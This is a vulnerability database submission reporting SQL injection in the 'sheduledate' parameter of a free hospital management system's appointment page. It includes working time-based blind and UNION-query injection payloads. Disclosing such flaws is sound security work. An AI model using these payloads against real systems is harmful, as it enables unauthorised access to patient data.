Submit #193770: SQL injection in Free Hospital Management System for Small Practices 1.0info

TitleSQL injection in Free Hospital Management System for Small Practices 1.0
DescriptionThere is an SQL injection vulnerability in the 'sheduledate' parameter of /patient/appointment.php. Parameter: sheduledate (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sheduledate=2023-08-24' AND (SELECT 7187 FROM (SELECT(SLEEP(5)))sIsM) AND 'mPuB'='mPuB Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: sheduledate=2023-08-24' UNION ALL SELECT 43,43,43,43,43,43,43,CONCAT(0x7170717a71,0x716e716574505a584f787954516777664772734e566b676d717a45666e65774d5a554250687a6748,0x71626b7871),43-- -
Source⚠️ https://github.com/CookedMelon/cve/tree/master/hospital/patient
User
 CookedMelon (UID 52513)
Submission08/11/2023 03:56 (3 years ago)
Moderation08/20/2023 09:01 (9 days later)
StatusAccepted
VulDB entry237561 [SourceCodester Free Hospital Management System for Small Practices appointment.php sql injection]
Points20

Do you want to use VulDB in your project?

Use the official API to access entries easily!